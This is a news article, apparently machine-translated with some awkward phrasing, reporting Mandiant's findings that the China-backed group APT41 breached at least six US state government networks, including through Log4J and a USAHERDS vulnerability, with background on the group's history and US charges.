According to several reports released over the years, China has become home to some of the most famous hackers and hacking groups in the world. Now, a new threat analysis from cybersecurity firm Mandient has revealed that a highly advanced hacker organization backed by the Chinese government has hacked into the computer systems of at least six US state governments.
According to a threat analysis by Mandient, which had previously uncovered state-sponsored attacks against key US government agencies such as the SolarWinds hack, the group known as ‘APT41’ attacked the United States between May 2021 and February 2022. targeted the state governments.
When the network was breached Mandiant discovered evidence of exclusion of personally identifiable information consistent with an “espionage operation”.
But the company said it could not make a conclusive assessment of the objective at this time. Overall, this analysis, published on March 8, paints a picture of a formidable enemy that is constantly changing.
The report said: “APT41’s recent activity against US state governments includes significant new capabilities, ranging from new attack vectors to post-compromise tools and technology.”
The report further states, “APT41 can quickly adapt its early access techniques by re-compromising the environment through a different vector or by rapidly operating a new vulnerability.”
According to the analysis, the group of threat actors shows a willingness to redeploy and deploy capabilities through “new attack vectors” rather than storing them for future use.
It also found that the APT41 group was able to break into government networks by exploiting vulnerabilities in Microsoft’s .NET developer platform, including a previously unseen vulnerability in USAHERDS, a database for animal health reporting.
The US Cyber Security and Infrastructure Security Agency (CISA) on 10 December officially warned that there was a vulnerability in Log4J, software used by several top tech companies around the world that hackers could use to gain further access to computers. can do for.
According to US officials, vulnerable software was installed on hundreds of millions of devices around the world. Officials in the US have been urging corporations to upgrade their software for weeks, and the White House hosted a conference with tech CEOs in January of this year to try to address the core problem of the software that Not secure by design.
However, according to Mandient, Chinese hackers began using Log4J’s weakness to break into two US state agencies within hours of the CISA notification.
modus operandi
APT41’s activities were previously detailed in depth in a report by cyber security firm FireEye, which dubbed the hacking group a ‘double dragon’ due to its dual focus on espionage and financial cybercrime.
The FireEye report, among other things, details the history of supply chain attacks against software developers prior to 2014; In some documented cases, APT41 hackers were able to insert malicious code into video game files sold to users by legitimate game distributors.
The hacking group’s operations eventually caught the attention of US officials, and in 2019 and 2020, the Justice Department filed charges against five members of APT41, putting them on the FBI’s Cyber Most Wanted list.
While APT41 has been linked to both financial crime and espionage, Mandiant researchers believe the latter is aimed at this recent case.
The latest report shows how difficult it is to prevent state-sponsored hackers from gaining access to US networks, while US officials are warning of a potential threat. It is also a reminder that, while many experts are looking for Russian cyber threats during the Ukraine conflict, other state-backed hackers continue to do their malicious work.
Recently, intelligence agencies in the US said in their annual assessment of global threats, “We assess that China presents the most widespread, most proactive and persistent cyber-espionage threat to US government and private sector networks.”
It is now understood that as the investigation progresses, the list of government agencies affected by the cyber threat could grow.
Read minute-by-minute news updates for Uttar Pradesh Election Result 2022, Punjab Election Result 2022, Uttarakhand Election Result 2022, Manipur Election Result 2022And Goa election result 2022,
Click here for seat-wise LIVE result Updates.